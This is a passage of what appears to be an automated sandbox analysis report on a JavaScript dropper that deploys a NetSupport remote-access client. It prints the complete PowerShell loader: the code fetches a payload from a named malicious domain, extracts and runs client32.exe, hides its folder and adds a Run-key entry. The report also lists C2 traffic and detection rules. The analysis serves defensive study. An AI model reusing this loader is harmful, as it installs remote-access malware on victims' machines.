System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { 
Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5972, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if

                                Remote Access Functionality

                                Source: File created Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 612, TargetFilename: C:\Users\user\AppData\Roaming\QCHBWPB-9\NSM.LIC
                                Timestamp:07/17/24-15:19:55.846593
                                SID:2054434
                                Source Port:62382
                                Destination Port:53
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:2024-07-17T15:19:43.805193+0200
                                SID:2827745
                                Source Port:49705
                                Destination Port:443
                                Protocol:TCP
                                Classtype:Malware Command and Control Activity Detected
                                Timestamp:2024-07-17T15:19:55.846593+0200
                                SID:2054434
                                Source Port:62382
                                Destination Port:53
                                Protocol:UDP
                                Classtype:Exploit Kit Activity Detected


                                AV Detection

                                Source: http://luxurycaborental.com/c Avira URL Cloud: Label: malware
                                Source: http://luxurycaborental.com/cdn-vs/data.php?12105 Avira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL ReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe ReversingLabs: Detection: 26%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exe ReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106ABD0

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                Source: Traffic Snort IDS: 2054434 ET CURRENT_EVENTS ZPHP Domain in DNS Lookup (luxurycaborental .com) 192.168.2.5:62382 -> 1.1.1.1:53
                                Source: global traffic HTTP traffic detected: GET /cdn-vs/data.php?12105 HTTP/1.1 Host: luxurycaborental.com Connection: Keep-Alive
                                Source: global traffic HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: Joe Sandbox View IP Address: 104.26.0.231
                                Source: Joe Sandbox View ASN Name: COGENT-174US
                                Source: unknown TCP traffic detected without corresponding DNS query: 194.180.191.69
                                Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global traffic DNS traffic detected: DNS query: luxurycaborental.com
                                Source: global traffic DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknown HTTP traffic detected: POST http://194.180.191.69/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 194.180.191.69 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1 Data Raw: Data Ascii:
                                Source: client32.exe String found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe String found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exe String found in binary or memory: http://127.0.0.1
                                Source: client32.exe String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: wscript.exe String found in binary or memory: http://luxurycaborental.com/c
                                Source: wscript.exe, 00000000.00000003.2122640509.0000027C6401A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://luxurycaborental.com/cdn-vs/data.php?12105
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
                                Source: wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperation
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperation
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Events/mousewheel)
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://echarts.apache.org/examples/en/editor.html?c=custom-gantt-flight
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/echarts/issues/14266
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/11369
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/apache/incubator-echarts/issues/12229
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3-hierarchy/blob/4c1f038f2725d6eae2e49b61d01456400694bac4/src/tree.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/layout/treemap.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/time/scale.js
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C618A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2116329159.0000027C62758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: wscript.exe, 00000000.00000003.2116329159.0000027C61D58000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2114675295.0000027C60EA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,4_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110335A0 GetClipboardFormatNameA,SetClipboardData,6_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,6_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,4_2_11033320
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11114590
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11114590
                                Source: Yara matchFile source: 7.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111165C0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_111165C0

                                System Summary

                                Source: updates.js, type: SAMPLE Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exe
                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_11113190: GetKeyState, DeviceIoControl, keybd_event
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_1115EA00: FindWindowA, _memset, CreateProcessAsUserA, GetLastError, WinExec, CloseHandle, CloseHandle, CloseHandle, WinExec
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_1102D9F4: Sleep, GetModuleFileNameA, GetFileAttributesA, _memset, FindFirstFileA, FindNextFileA, FindNextFileA, FindClose, ExitWindowsEx, ExitWindowsEx, Sleep, ExitWindowsEx, Sleep, ExitProcess
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_1102DD21: CloseHandle, _free, _free, GetModuleFileNameA, GetFileAttributesA, _memset, FindFirstFileA, FindNextFileA, FindNextFileA, FindClose, ExitWindowsEx, ExitWindowsEx, Sleep, ExitWindowsEx, Sleep, ExitProcess
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 6_2_1102D900: InterlockedIncrement, Sleep, Sleep, GetCurrentProcess, SetPriorityClass, SetEvent, Sleep, PostThreadMessageA, PostThreadMessageA, FindCloseChangeNotification, _free, _free, GetModuleFileNameA, GetFileAttributesA, _memset, FindFirstFileA, FindNextFileA, FindNextFileA, FindClose, ExitWindowsEx, ExitWindowsEx, Sleep, ExitWindowsEx, Sleep, ExitProcess
Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
Source: updates.js; Initial sample: Strings found which are bigger than 50
Source: updates.js, type: SAMPLE; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine; Classification label: mal100.rans.troj.expl.evad.winJS@8/28@2/3
Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe; Code function: 4_2_1105A760: GetLastError, FormatMessageA, LocalFree
